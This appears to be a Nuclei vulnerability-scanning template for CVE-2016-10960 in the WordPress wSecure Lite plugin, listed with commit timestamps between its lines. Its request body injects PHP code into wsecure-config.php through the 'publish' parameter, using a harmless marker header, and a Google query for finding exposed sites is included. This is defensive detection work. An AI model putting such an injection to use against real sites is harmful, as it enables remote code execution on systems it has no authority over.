2021-07-15 02:41:14 +00:00
id : CVE-2016-10960
info :
2022-04-15 16:39:44 +00:00
name : WordPress wSecure Lite < 2.4 - Remote Code Execution
2021-07-15 02:41:14 +00:00
author : daffainfo
2021-09-10 11:26:40 +00:00
severity : high
2022-04-15 16:39:44 +00:00
description : WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
2021-08-18 11:37:49 +00:00
reference :
2021-07-16 05:43:17 +00:00
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
2022-05-17 09:18:12 +00:00
- https://wordpress.org/plugins/wsecure/#developers
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-10960
cwe-id : CWE-20
2023-07-11 19:49:27 +00:00
epss-score : 0.01127
cpe : cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:*
2022-07-11 17:25:11 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-11 17:25:11 +00:00
google-query : inurl:"/wp-content/plugins/wsecure"
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : joomlaserviceprovider
product : wsecure
2022-04-15 16:39:44 +00:00
tags : cve,cve2016,wordpress,wp-plugin,rce
2021-07-15 02:41:14 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-15 02:41:14 +00:00
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
2023-07-11 19:49:27 +00:00
2021-07-16 12:24:37 +00:00
body : 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
2021-07-15 02:41:14 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-07-15 02:41:14 +00:00
words :
2021-07-16 12:24:37 +00:00
- "Nuclei: CVE-2016-10960"
2021-07-15 02:41:14 +00:00
condition : and
2023-07-11 19:49:27 +00:00
2021-07-15 02:41:14 +00:00
- type : status
status :
- 200